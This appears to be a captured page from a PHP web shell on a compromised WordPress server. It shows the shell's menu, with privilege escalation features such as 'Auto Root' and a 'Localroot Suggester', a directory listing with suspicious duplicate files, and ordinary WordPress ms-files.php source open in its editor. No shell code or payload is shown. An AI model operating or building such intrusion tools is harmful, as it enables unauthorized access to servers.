Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.190.176.26
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
file /
Delete
Unzip
Name
Size
Permission
Date
Action
block-bindings.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
1.84
KB
-rw-r--r--
2025-04-15 17:44
class-wp-hook.php
15.63
KB
-rw-r--r--
2023-09-18 12:41
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-matchesmapregex.php
1.79
KB
-rw-r--r--
2024-04-03 05:49
class-wp-network.php
12.01
KB
-rw-r--r--
2024-11-13 12:36
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-widget-20250514210749.php
18
KB
-rw-r--r--
2025-04-15 17:44
comments.php
6.61
KB
-rw-r--r--
2024-07-16 17:55
customize-selective-refresh.min.js
10.44
KB
-rw-r--r--
2025-04-15 17:44
customize-widgets.min-20250514002100.js
34.18
KB
-rw-r--r--
2025-04-15 17:44
default-widgets.php
2.24
KB
-rw-r--r--
2025-04-15 17:44
editor-rtl.css
855
B
-rw-r--r--
2024-07-16 17:55
editor-rtl.min.css
763
B
-rw-r--r--
2024-07-16 17:55
editor.css
854
B
-rw-r--r--
2024-07-16 17:55
editor.min.css
762
B
-rw-r--r--
2024-07-16 17:55
feed-rss.php
1.16
KB
-rw-r--r--
2020-01-29 00:45
home-link-20250514210203.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-files-20250514210337.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
ms-files.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
navigation-link.php
13.59
KB
-rw-r--r--
2025-04-15 17:44
pluggable-deprecated.php
6.18
KB
-rw-r--r--
2025-04-15 17:44
plugin.php
34.74
KB
-rw-r--r--
2024-07-16 17:55
post-excerpt.php
3.37
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
robots-template.php
5.06
KB
-rw-r--r--
2022-04-06 15:33
rss.php
22.57
KB
-rw-r--r--
2024-11-13 12:36
shortcodes-20250514174002.php
23.49
KB
-rw-r--r--
2024-07-16 17:55
shortcodes.php
23.49
KB
-rw-r--r--
2024-07-16 17:55
spl-autoload-compat.php
441
B
-rw-r--r--
2020-11-12 11:17
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
714
B
-rw-r-----
2023-10-31 17:17
style-rtl.min.css
643
B
-rw-r-----
2023-10-31 17:17
style.css
713
B
-rw-r-----
2023-10-31 17:17
style.min.css
642
B
-rw-r-----
2023-10-31 17:17
view.asset.php
84
B
-rw-r--r--
2024-04-03 05:49
view.js
3.04
KB
-rw-r--r--
2025-04-15 17:44
view.min.asset.php
84
B
-rw-r--r--
2024-04-03 05:49
view.min.js
717
B
-rw-r--r--
2024-04-03 05:49
widgets.php
69.06
KB
-rw-r--r--
2025-05-09 07:39
wp-db.php
445
B
-rw-r--r--
2022-07-21 22:45
Save
Rename
<?php /** * Multisite upload handler. * * @since 3.0.0 * * @package WordPress * @subpackage Multisite */ define( 'MS_FILES_REQUEST', true ); define( 'SHORTINIT', true ); /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; if ( ! is_multisite() ) { die( 'Multisite support not enabled' ); } ms_file_constants(); if ( '1' === $current_blog->archived || '1' === $current_blog->spam || '1' === $current_blog->deleted ) { status_header( 404 ); die( '404 — File not found.' ); } $file = rtrim( BLOGUPLOADDIR, '/' ) . '/' . str_replace( '..', '', $_GET['file'] ); if ( ! is_file( $file ) ) { status_header( 404 ); die( '404 — File not found.' ); } $mime = wp_check_filetype( $file ); if ( false === $mime['type'] && function_exists( 'mime_content_type' ) ) { $mime['type'] = mime_content_type( $file ); } if ( $mime['type'] ) { $mimetype = $mime['type']; } else { $mimetype = 'image/' . substr( $file, strrpos( $file, '.' ) + 1 ); } header( 'Content-Type: ' . $mimetype ); // Always send this. if ( ! str_contains( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) ) { header( 'Content-Length: ' . filesize( $file ) ); } // Optional support for X-Sendfile and X-Accel-Redirect. if ( WPMU_ACCEL_REDIRECT ) { header( 'X-Accel-Redirect: ' . str_replace( WP_CONTENT_DIR, '', $file ) ); exit; } elseif ( WPMU_SENDFILE ) { header( 'X-Sendfile: ' . $file ); exit; } $wp_last_modified = gmdate( 'D, d M Y H:i:s', filemtime( $file ) ); $wp_etag = '"' . md5( $wp_last_modified ) . '"'; header( "Last-Modified: $wp_last_modified GMT" ); header( 'ETag: ' . $wp_etag ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + 100000000 ) . ' GMT' ); // Support for conditional GET - use stripslashes() to avoid formatting.php dependency. if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) { $client_etag = stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ); } else { $client_etag = ''; } if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) { $client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ); } else { $client_last_modified = ''; } // If string is empty, return 0. If not, attempt to parse into a timestamp. $client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0; // Make a timestamp for our most recent modification. $wp_modified_timestamp = strtotime( $wp_last_modified ); if ( ( $client_last_modified && $client_etag ) ? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) ) : ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) ) ) { status_header( 304 ); exit; } // If we made it this far, just serve the file. readfile( $file ); flush();